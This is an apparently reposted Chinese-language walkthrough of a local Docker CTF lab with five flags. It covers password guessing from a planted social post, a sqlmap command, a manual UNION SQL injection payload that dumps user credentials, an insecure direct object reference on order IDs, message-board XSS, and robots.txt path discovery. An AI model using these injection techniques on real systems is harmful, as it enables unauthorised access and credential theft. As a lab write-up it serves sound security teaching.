国外某CTF靶场通关笔记

admin
admin
admin
0
文章
0
评论
2026-01-22 00:28:19 网络安全文章 来源:ZONE.CI 全球网 0 阅读模式

文章总结: 本文记录作者通关国外CTF靶场的完整流程:先Docker启动环境,登录页用社工从梅西生日推文猜出账号lionel/antonela240687;登录后搜索框存在SQL注入,手工union查询得root/GTfCR38n3A并登陆;利用订单ID越权查看他人订单;留言板存储XSS触发flag;目录扫描发现robots.txt泄露路径,拼接/static/secret/not-for-public/flag.txt拿到终flag。共五旗,覆盖信息搜集、注入、越权、XSS、目录遍历技巧。 综合评分: 78 文章分类: CTF,WEB安全,渗透测试,实战经验

cover_image

国外某CTF靶场通关笔记

原创

摆烂的beizeng 摆烂的beizeng

土拨鼠的安全屋

2026年1月21日 08:06 山东

靶场一

靶场搭建

使用docker启动环境

docker-compose up --build

image-20260105104445488

访问本机3000端口即可正常访问靶场

image-20260105104533467

靶场通关

flag1

目标存在登陆页面

image-20260105104613920

针对目标页面进行社会工程学发现存在一些人名介绍

image-20260105104655122

根据以下信息

Lionel Messi
@lionel
My wife Antonela bought the chocolate cake for my birthday on June 24th. Not too bad for a 1987 Argentinian kid! My kids Thiago, Mateo, and Ciro loved it!

得知正确的账号密码为:lionel/antonela240687

登陆之后我们获取第一个flag:FLAG 1: 4178{th3_g04t}。

image-20260105104946947

flag2

登陆之后存在搜索商品的功能,我们尝试进行sql注入

image-20260105104928131

添加单引号’

image-20260105105017403

报错

image-20260105105028166

因为注入点归属的功能需要登陆之后才能使用,因此在使用sqlmap的时候需要带上cookie

 python sqlmap.py -u "http://127.0.0.1:3000/orders/1*" --cookie="session=eyJ1c2VySUQiOjEsInVzZXJOYW1lIjoibGlvbmVsIn0.aVsnKw.j8eehiRbFh9cySaegb6F7w1Qz-0"

image-20260105105521391

但是使用sqlmap的过程中会导致目标数据库的请求太多

image-20260105105551399

这里尝试重启容器进行手工注入

2 ' union select 1,2,(select group_concat(username) from users ),(select group_concat(password) from users )#

image-20260105105824562

使用root/GTfCR38n3A登陆即可获取flag2:FLAG 3: 4178{r00t_ac455};

image-20260105105933506

flag3

系统提供订单查看功能,点击订单可以查看当前用户的订单信息

image-20260105105356958

这里存在越权通过查看订单id为3的订单可以获取到flag:FLAG 2: 4178{n0t_y0ur_0rd3r};

image-20260105110025756

flag4

使用root用户登陆之后,发现存在留言板功能,输入xss代码获取flag,

image-20260105133810310

flag5

使用工具进行目录扫描,发现存在一个robots.txt文件。

image-20260105135629056

访问

image-20260105135701286

访问:http://127.0.0.1:3000/files/index

image-20260105135722275

拼接目录即可获取最后一个flag:http://127.0.0.1:3000/static/secret/not-for-public/flag.txt

image-20260105135838423

4178{r0bot_4cc355_4ll0w3d};

免责声明:

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。

任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我

本文转载自:土拨鼠的安全屋 摆烂的beizeng 摆烂的beizeng《国外某CTF靶场通关笔记》

版权声明

本站仅做备份收录,仅供研究与教学参考之用。
读者将信息用于其他用途的,全部法律及连带责任由读者自行承担,本站不承担任何责任。

ZONE.CI 全球网 | 安全领域涉猎者-乌云独行地带
ZONE.CI 全球网
安全领域涉猎者-乌云独行地带
ZONE.CI 全球网 | 安全领域涉猎者-乌云独行地带
安全领域涉猎者-乌云独行地带
ZONE.CI 全球网
评论:0   参与:  0